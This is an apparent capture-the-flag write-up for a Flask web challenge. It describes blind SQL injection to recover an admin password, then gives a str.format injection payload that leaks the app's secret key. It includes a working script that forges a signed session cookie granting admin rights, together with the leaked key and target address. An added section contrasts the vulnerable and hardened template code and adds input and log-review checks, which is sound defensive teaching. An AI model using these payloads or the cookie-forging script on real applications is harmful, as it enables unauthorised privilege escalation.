Only registration and login are available. Following the challenge hint, the email field of the registration form is vulnerable to blind SQL injection; dumping through it yields the admin password h4ck4fun.
After logging in as admin, an extra "change email" function appears.
The hint says secret in /flag, so visit http://220.249.52.133:34412/flag
From the hint, the guess is that we need to obtain the secret_key, re-sign the cookie with an added isadmin field, and only then get the flag.
At the change-email endpoint, submit mail={user.__class__.__init__.__globals__[current_app].config}@qq.com to obtain the secret_key.
mail={user.__class__.__init__.__globals__[capp].secret_key}@qq.com also works.
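The payload shape above (attribute and key lookups inside braces) is what a Python str.format template evaluates when user input is spliced into the template string itself. The following is an added example, not code from the challenge or the writeup author, showing that assumed vulnerable pattern next to a hardened version and two defender-side checks: an input-shape filter for the email field and a log-review heuristic for format-string probes. All names (CURRENT_APP_CONFIG, User, the render functions) and the placeholder key are constructed for the demo; the challenge's globals and key are not reproduced.

```python
import re

# Constructed stand-in for an application module: a module-level config object
# sits in the globals that a format-string payload can reach through
# user.__class__.__init__.__globals__. The key is a placeholder, not the
# challenge's key.
CURRENT_APP_CONFIG = {"SECRET_KEY": "PLACEHOLDER-SECRET-KEY"}


class User:
    """Minimal user model; only its __init__ globals matter for the demo."""

    def __init__(self, name, mail):
        self.name = name
        self.mail = mail


def render_mail_notice_vulnerable(user, new_mail):
    """Vulnerable pattern (assumed): the user-supplied value is concatenated
    into the template *before* .format() runs, so any {...} field inside it is
    evaluated against the format arguments, including attribute and key lookups."""
    template = "Mail for {user.name} changed to " + new_mail
    return template.format(user=user)


def render_mail_notice_safe(user, new_mail):
    """Hardened: the template is a constant and the value is passed as an
    argument, so braces in the input remain literal text."""
    return "Mail for {user.name} changed to {mail}".format(user=user, mail=new_mail)


# Conservative e-mail shape check, applied before the value reaches any template
# or query; braces, brackets and whitespace are rejected outright.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def is_acceptable_email(value):
    return _EMAIL_RE.fullmatch(value) is not None


# Log-review signal: format-string probes carry braces or dunder names.
_PROBE_RE = re.compile(r"[{}]|__\w+__")


def looks_like_format_probe(value):
    return _PROBE_RE.search(value) is not None


if __name__ == "__main__":
    u = User("admin", "admin@qq.com")
    # Constructed probe following the page's payload shape, aimed at the demo globals.
    probe = "{user.__class__.__init__.__globals__[CURRENT_APP_CONFIG][SECRET_KEY]}@qq.com"
    print(render_mail_notice_vulnerable(u, probe))  # the placeholder key appears in the output
    print(render_mail_notice_safe(u, probe))        # the braces are echoed back unchanged
    print(is_acceptable_email(probe), is_acceptable_email("admin@qq.com"))
    print(looks_like_format_probe(probe), looks_like_format_probe("admin@qq.com"))
```

The two renderers differ only in where the input enters: as part of the template (evaluated) or as a format argument (inert). The shape check belongs at the boundary, since it also blocks the quoting characters needed for the SQL injection stage of this challenge; the probe heuristic is for reviewing submitted values after the fact.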
Use a script to re-sign the cookie:

```python
from flask.sessions import SecureCookieSessionInterface
import traceback
import ast


class MockApp(object):
    """Just enough of a Flask app for the session serializer: the secret key,
    plus an empty config that newer Flask versions also consult."""

    def __init__(self, secret_key):
        self.secret_key = secret_key
        self.config = {}


def encode(secret_key, session_cookie_structure):
    """Sign a session dict (given as a Python literal string) with secret_key."""
    try:
        app = MockApp(secret_key)
        session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
        si = SecureCookieSessionInterface()
        s = si.get_signing_serializer(app)
        return s.dumps(session_cookie_structure)
    except Exception:
        traceback.print_exc()
        raise


if __name__ == "__main__":
    payload = "{'isadmin': 1, 'user': (1, 'admin', 'admin@qq.com')}"
    key = '5d2b90b3752f9fc73310f89b8cfc265b'
    print(encode(key, payload))
```
Sending the re-signed cookie yields the flag.